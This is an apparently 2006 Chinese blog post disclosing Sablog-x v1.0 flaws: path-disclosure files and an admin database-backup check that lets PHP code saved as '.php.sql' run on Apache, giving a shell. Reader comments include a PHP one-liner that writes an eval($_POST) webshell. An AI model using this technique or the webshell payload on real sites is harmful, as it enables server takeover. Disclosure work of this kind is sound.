Sablog-x v1.0 Vulnerability

[just fun :)]

1.Path Disclosure

eg:
/archives/include/article.inc.php
/archives/include/global.php
/archives/include/index.inc.php
/include/fense.php
/include/seccode.php

2.从后台得到shell
/admin/database.php 行112-163

        $path = $_POST['path'];
 if (file_exists($path)) {
  redirect('文件已经存在,请选择其他文件名.', './admincp.php?job=database&action=backup',5);
 }
    $tables = $_POST['table'];
 $extension=strtolower(substr(strrchr($path,'.'),1)); //取最后一个.后面的判断
 if ($extension == 'sql') {
 
               ...............

          } else {
  redirect('备份生成文件的扩展名必须为.sql', './admincp.php?job=database&action=backup',5);
 }

在备用数据库时候只是简单的取最后一个.为标准,判断是不是sql,那么如果是apache服务器,先在数据库里插入我们的shellcode在备用后缀为.php.sql 的文件,里面的phpcode将被执行。

关键词: 脚本渗透 , sablog , 漏洞

上一篇: angel's blog被三次入侵
下一篇: WEKWEN再现,八进制被黑....

相关文章
访客评论
#1
回复 KKKK 2006-05-18, 08:43:28
<?fputs(fopen('XXXX.php','w+'),'< ?php @eval($_POST[c])? >');? >
#2
回复 N* 2006-05-18, 08:44:15
你NX
.................
#3
回复 4mxku 2006-05-18, 08:45:20
angel已经在SP1中修正了

不过,还没有看到SP1面世
#4
回复 byron 2006-05-18, 08:45:46
我不懂,我瞎说..

怎么拿到ftp或者webshell权限上传一个*.php.sql文件?
#5
回复 yonnyer 2006-05-19, 10:31:01
<?fputs(fopen('XXXX.php','w+'),'< ?php @eval($_POST[c])? >');? >
这句是什么意思哦,老大

不明白

?
发表评论

评论内容 (必填):